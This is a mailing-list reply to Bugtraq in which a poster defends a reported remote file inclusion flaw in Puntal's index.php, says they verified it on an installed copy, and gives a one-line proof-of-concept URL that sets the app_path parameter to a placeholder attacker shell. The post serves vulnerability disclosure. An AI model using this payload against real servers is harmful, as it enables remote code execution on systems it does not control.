Re: RE: Puntal (index.php) Remote File Inclusion Vulnerabilities

From: donald00@live.com
To: bugtraq@securityfocus.com
Cc:
Subject: Re: RE: Puntal (index.php) Remote File Inclusion Vulnerabilities
Date:


sorry Tom , in which line which confirms that the variable "app_path" and "puntal_path" is defined with functions to protect and handle inclusion or accessing to or from index.php file ?

please check again or Read the full script code in index.php file , and then please seen or check The example URI / P0C for this issue.

For verified or proofed this Vulnerabilities , I just Install Puntal , and this exploits is working.

http://localhost//path/index.php?app_path= <attacker shell>





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.